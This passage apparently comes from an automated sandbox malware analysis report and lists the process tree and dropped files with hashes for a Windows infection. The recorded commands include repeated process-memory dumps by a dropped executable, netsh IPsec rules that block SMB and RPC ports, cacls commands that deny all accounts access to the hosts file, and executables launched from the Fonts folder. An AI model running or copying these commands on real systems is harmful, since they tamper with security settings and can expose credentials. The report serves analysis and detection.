                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4356 C:\Windows\TEMP\rqfmysvtl\4356.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1088
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 1704 C:\Windows\TEMP\rqfmysvtl\1704.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3296
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4452 C:\Windows\TEMP\rqfmysvtl\4452.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5528
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4128 C:\Windows\TEMP\rqfmysvtl\4128.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5352
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4428 C:\Windows\TEMP\rqfmysvtl\4428.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1560
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh ipsec static delete all
                                                                                      2⤵
                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6088
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                                                      2⤵
                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                      PID:3248
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh ipsec static add filteraction name=BastardsList action=block
                                                                                      2⤵
                                                                                        PID:3856
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                                                        2⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5732
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                                        2⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1748
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                                        2⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5080
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3572
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4964
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                        2⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        PID:5184
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2116
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh ipsec static set policy name=Bastards assign=y
                                                                                        2⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        PID:5260
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                        2⤵
                                                                                          PID:5572
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                            3⤵
                                                                                              PID:1864
                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                              3⤵
                                                                                                PID:1668
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                3⤵
                                                                                                  PID:1832
                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                  3⤵
                                                                                                    PID:5696
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3264
                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2736
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2744 C:\Windows\TEMP\rqfmysvtl\2744.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5192
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 640 C:\Windows\TEMP\rqfmysvtl\640.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2552
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 3816 C:\Windows\TEMP\rqfmysvtl\3816.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:5860
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4112 C:\Windows\TEMP\rqfmysvtl\4112.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1424
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 1708 C:\Windows\TEMP\rqfmysvtl\1708.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:404
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2428 C:\Windows\TEMP\rqfmysvtl\2428.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:5144
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2736 C:\Windows\TEMP\rqfmysvtl\2736.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2588
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static delete all
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1356
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:2788
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filteraction name=BastardsList action=block
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:4796
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5656
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:5088
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5728
                                                                                                • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                                  C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2756 C:\Windows\TEMP\rqfmysvtl\2756.dmp
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4700
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2356
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                                                  2⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:3416
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5512
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                                  2⤵
                                                                                                    PID:2612
                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                                    2⤵
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5268
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                    2⤵
                                                                                                      PID:2584
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5512
                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2112
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5948
                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1628
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                        3⤵
                                                                                                          PID:1272
                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5092
                                                                                                    • C:\Windows\SysWOW64\hmdriy.exe
                                                                                                      C:\Windows\SysWOW64\hmdriy.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4664
                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\lbntnde.exe
                                                                                                      1⤵
                                                                                                        PID:3160
                                                                                                        • C:\Windows\Fonts\lbntnde.exe
                                                                                                          C:\Windows\Fonts\lbntnde.exe
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:1832
                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                        C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\lbntnde.exe
                                                                                                        1⤵
                                                                                                          PID:2356
                                                                                                          • C:\Windows\Fonts\lbntnde.exe
                                                                                                            C:\Windows\Fonts\lbntnde.exe
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:408

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Windows\SysWOW64\Packet.dll

                                                                                                          Filesize

                                                                                                          95KB

                                                                                                          MD5

                                                                                                          86316be34481c1ed5b792169312673fd

                                                                                                          SHA1

                                                                                                          6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                          SHA256

                                                                                                          49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                          SHA512

                                                                                                          3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                        • C:\Windows\SysWOW64\wpcap.dll

                                                                                                          Filesize

                                                                                                          275KB

                                                                                                          MD5

                                                                                                          4633b298d57014627831ccac89a2c50b

                                                                                                          SHA1

                                                                                                          e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                          SHA256

                                                                                                          b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                          SHA512

                                                                                                          29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                        • C:\Windows\TEMP\amydesk.exe

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                          MD5

                                                                                                          398fb3fed9be2941f3548a5d0d4b862c

                                                                                                          SHA1

                                                                                                          e9c9e3a4be652de36d1b8cc849c8b3c10e130e2f

                                                                                                          SHA256

                                                                                                          fe345cc8b133d91a3b0bcbf9db4cbc7cc83d1e4f83c297161f83a4bed1ce6a61

                                                                                                          SHA512

                                                                                                          6f406d8d336ead02ff70f9455f070049bb4c923d3d6132381536f5f7e7d67a350b4dea94ad38541be472396fbfe182182f532a51ef37dc491bdbeed477fad29c

                                                                                                        • C:\Windows\TEMP\fsyyufbyc\config.json

                                                                                                          Filesize

                                                                                                          714B

                                                                                                          MD5

                                                                                                          7ee64caf54228be5294e542615bcbd9a

                                                                                                          SHA1

                                                                                                          a520fa5cff0dec520231e54d203e512eb3e148f5

                                                                                                          SHA256

                                                                                                          9a19e014fdf05b035dd78c383dd41d2346e95a80e63750e4d7ca73b183b19265

                                                                                                          SHA512

                                                                                                          7ff2fc1cfddbd563978f6d044e60496d22b7fc481e817a0410f98ef9f4335926db6e1bfb3c7ee18f3644aa9f8062a849f5ea0245a7f5cb82193cbdbce09e26bd

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\2488.dmp

                                                                                                          Filesize

                                                                                                          3.6MB

                                                                                                          MD5

                                                                                                          1ed6a522c26cd1c7a93cce972e6e9f5f

                                                                                                          SHA1

                                                                                                          d13107cc9344343e99d7e8d6498cee6fbcf3b3aa

                                                                                                          SHA256

                                                                                                          48120c2e70baa7ba8367508cf5c8460ec58dc08c98e6573f8980e54e44963b03

                                                                                                          SHA512

                                                                                                          cf41a825f57e8f8f72343eeecad270c46f1a07111a18d299d7edb5eb18c7aa733e9972a8ecbcecac3d762a3cb7de8e6cf428cf3f18ed89fa2e0fb2f76e33a89f

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\2652.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                          MD5

                                                                                                          f2f6aa5cb6a8631883ccb3d93367d943

                                                                                                          SHA1

                                                                                                          e60cd08f8ef2e2080cef04029b88f5c0cf248f7c

                                                                                                          SHA256

                                                                                                          2bdf073b27caccebae48382e2ed0c616fa7702c550f3f65a9dea1750f651f437

                                                                                                          SHA512

                                                                                                          477caf4aa5d51bcf6604daa5fd43d3945f453b235ba4e654d88c8bfc926d3f6cf70b6bd5c8ec59e6bb75e9e7fc082be9b88a46620edabd4cd039bc3cfca9be5a

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\2796.dmp

                                                                                                          Filesize

                                                                                                          7.6MB

                                                                                                          MD5

                                                                                                          3edd6e91211c0e4a0af14465ed8319bb

                                                                                                          SHA1

                                                                                                          6d321f2b7cabe625b55a39b7023b9304a00e9efa

                                                                                                          SHA256

                                                                                                          ef24bf69b58a8a46fda38e18372d2ca9261394cada99e2dafec44910e3188503

                                                                                                          SHA512

                                                                                                          b72e31ccca59f71dba58f1737b16cb3a8c4736b688d96d82d80d68b99dd0980c6b997738961de19fe3cc9afaedc502975f0e0ae953b92a6fdcf3eef6322661a9

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\2964.dmp

                                                                                                          Filesize

                                                                                                          818KB

                                                                                                          MD5

                                                                                                          6ebbe124665b233c61d48ea0d9b4e9bb

                                                                                                          SHA1

                                                                                                          88ec5447f8f3a97116506f825f8f914b5a55d8ad

                                                                                                          SHA256

                                                                                                          6d3f26a5f442a51001834c8db26b704041cd2229897ae278781142036e4a16b4

                                                                                                          SHA512

                                                                                                          12b222eb9543c4682934aff1f3359cb60c856fd9c2096e9ef733673b0b2b4d779e0ea6d892948b5323ba71b5ba3e1030f50a75e9bf2a56dab98b55f522780d2a

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\3892.dmp

                                                                                                          Filesize

                                                                                                          20.6MB

                                                                                                          MD5

                                                                                                          79e3ca133b5a02f824f62ea6ed9862c3

                                                                                                          SHA1

                                                                                                          67ecd3acdae7522ee55cd5b1b3330ad66f275cd0

                                                                                                          SHA256

                                                                                                          8c1e0ea997d1bf8af86acab5e2dc7468ede662f295a29226a3c7f204673bfd3b

                                                                                                          SHA512

                                                                                                          b25040091e180e32e688da38c3b8eebeff13d789a4d38d124ddcf187e39b52d1a06f97bbe3cff3a39b5ef1919d56023a80b9f6c9a77ceb275f4e4bd0b9a4920b

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\3956.dmp

                                                                                                          Filesize

                                                                                                          4.3MB

                                                                                                          MD5

                                                                                                          3e1f318db7a6592c01183441afaa7bd3

                                                                                                          SHA1

                                                                                                          d42b8f0fbc4c20e4cdd0b4169b3af90084c8a3cb

                                                                                                          SHA256

                                                                                                          9658eac55438331d8468bda4c16a13942ab9232bbde46a75f20275659a84e01f

                                                                                                          SHA512

                                                                                                          3b6243bb184ab7a5ea89173e0a6adf04ba24c889d83411c5f9a33da404cbc3c91935dfcb024d12b87210f38d9258043a4cacbaa15a660214078dc282eb8a67d3

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\768.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                          MD5

                                                                                                          fcde458a9472c29d9d439773ce2cf2f1

                                                                                                          SHA1

                                                                                                          de90a7d3a9c413e6441fd55d83db45d6d96c5f2a

                                                                                                          SHA256

                                                                                                          dd288581c2885d8be2908de5892b62b2ddaa155d89526ff9733d06576fe2fc83

                                                                                                          SHA512

                                                                                                          ee97a4a9df5aaf9e5c1b3f725bf021145592c6dc1ed8445f42a86ed541c14528986b23031eb94634d612e04ad2b8ab41850bd8eeec8179df67f075f734c0829e

                                                                                                        • C:\Windows\TEMP\rqfmysvtl\776.dmp

                                                                                                          Filesize

                                                                                                          1011KB

                                                                                                          MD5

                                                                                                          bd96d06c4f958d9c3ede955a9a33fb2c

                                                                                                          SHA1

                                                                                                          8ffde75652c9fdc3f059640187ed6f4f7bc72728

                                                                                                          SHA256

                                                                                                          b77ca344439a296bc4731225e0640a59d9a3248d8cfea36bc9ce408f5215002b

                                                                                                          SHA512

                                                                                                          ec16f75d864b6991397df6fa1ddd653bde5a66d3c1f2cf5c07dcdc256edf1a11d12de331a7cd31b22704af9903e21993aa7f2ed8a326292ade80fe8ea38e69ad

                                                                                                        • C:\Windows\Temp\fsyyufbyc\veqgqd.exe

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                          MD5

                                                                                                          6ef68c9b73b1beee2efabaf6dfe11051

                                                                                                          SHA1

                                                                                                          a7433bc216bf4d50994c91beffdd93ca0947a396

                                                                                                          SHA256

                                                                                                          ea71d8f5e0f511e5c82de4e50bf9def4f50817a0f7a5a1ba32027b806850aab0

                                                                                                          SHA512

                                                                                                          dc7193353e928178549e85544bd498e4ca6dd57fe4e53216ac1931af6938c23f5afce7a9b7d2510e4b9722c2e334ddb8242921c5cbb49288bc2cc300ee21e46c

                                                                                                        • C:\Windows\Temp\nseAB74.tmp\System.dll

                                                                                                          Filesize

                                                                                                          11KB

                                                                                                          MD5

                                                                                                          2ae993a2ffec0c137eb51c8832691bcb

                                                                                                          SHA1

                                                                                                          98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                          SHA256

                                                                                                          681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                          SHA512

                                                                                                          2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                        • C:\Windows\Temp\nseAB74.tmp\nsExec.dll

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          b648c78981c02c434d6a04d4422a6198

                                                                                                          SHA1

                                                                                                          74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                          SHA256

                                                                                                          3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                          SHA512

                                                                                                          219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                        • C:\Windows\Temp\rqfmysvtl\drenltvur.exe

                                                                                                          Filesize

                                                                                                          126KB

                                                                                                          MD5

                                                                                                          e8d45731654929413d79b3818d6a5011

                                                                                                          SHA1

                                                                                                          23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                          SHA256

                                                                                                          a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                          SHA512

                                                                                                          df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                        • C:\Windows\rqfmysvtl\Corporate\vfshost.exe

                                                                                                          Filesize

                                                                                                          381KB

                                                                                                          MD5

                                                                                                          fd5efccde59e94eec8bb2735aa577b2b

                                                                                                          SHA1

                                                                                                          51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                          SHA256

                                                                                                          441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                          SHA512

                                                                                                          74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                        • C:\Windows\rqfmysvtl\ytlimcrtn\iltrqyctt.exe

                                                                                                          Filesize

                                                                                                          63KB

                                                                                                          MD5

                                                                                                          821ea58e3e9b6539ff0affd40e59f962

                                                                                                          SHA1

                                                                                                          635a301d847f3a2e85f21f7ee12add7692873569

                                                                                                          SHA256

                                                                                                          a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

                                                                                                          SHA512

                                                                                                          0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

                                                                                                        • C:\Windows\rqfmysvtl\ytlimcrtn\ip.txt

                                                                                                          Filesize

                                                                                                          189B

                                                                                                          MD5

                                                                                                          9bd5f64f0310f81dab76bb736b66c2da

                                                                                                          SHA1

                                                                                                          a1221b3db0d5ad481b5b3a9d55ccea71c2a748aa

                                                                                                          SHA256

                                                                                                          88c3c2b0f11e0c5321c22b9fa3fe335691b14ccc5157b0f2fa5f52ee9aa63208

                                                                                                          SHA512

                                                                                                          60a86df690811ca93d3228e3bb98cab0f74d54985f9905575b4b4b536500ebf7811e2a0d69ffef781c3f9f1783230584b1bcb0d67e23212768ea3202bd15e736

                                                                                                        • C:\Windows\rqfmysvtl\ytlimcrtn\mltctcnbm.exe

                                                                                                          Filesize

                                                                                                          332KB

                                                                                                          MD5

                                                                                                          ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                          SHA1

                                                                                                          fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                          SHA256

                                                                                                          4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                          SHA512

                                                                                                          7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                        • C:\Windows\rqfmysvtl\ytlimcrtn\scan.bat

                                                                                                          Filesize

                                                                                                          159B

                                                                                                          MD5

                                                                                                          a07e5e453379d708044e27de86f36246

                                                                                                          SHA1

                                                                                                          8663879b974e20677ea784f7970ad29e018ec565

                                                                                                          SHA256

                                                                                                          ed79edf9ec94aa21edea36c46474cb50d66216b9dbd9630363fa3a17087a0c6c

                                                                                                          SHA512

                                                                                                          ef7d242158fe6ea3b956a06c6bb0772ca7082192e05bce3e5e98ab25d32b63e3021cd0fa6e6f0e1fe0de3adecdec1b6ff0ca8b680c83afde5687d104e0c5b7c6

                                                                                                        • C:\Windows\rqfmysvtl\ytlimcrtn\wpcap.exe

                                                                                                          Filesize

                                                                                                          424KB

                                                                                                          MD5

                                                                                                          e9c001647c67e12666f27f9984778ad6

                                                                                                          SHA1

                                                                                                          51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                          SHA256

                                                                                                          7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                          SHA512

                                                                                                          56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                        • C:\Windows\system32\drivers\etc\hosts

                                                                                                          Filesize

                                                                                                          1KB

                                                                                                          MD5

                                                                                                          c838e174298c403c2bbdf3cb4bdbb597

                                                                                                          SHA1

                                                                                                          70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                          SHA256

                                                                                                          1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                          SHA512

                                                                                                          c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                        • C:\Windows\trvuvbys\kxaijjkeemnjdde32537.exe

                                                                                                          Filesize

                                                                                                          68KB

                                                                                                          MD5

                                                                                                          8a75b0ef65cd434e12598d6d656e89a7

                                                                                                          SHA1

                                                                                                          92ac075ced9909b1f23416c881e924b0857d57cc

                                                                                                          SHA256

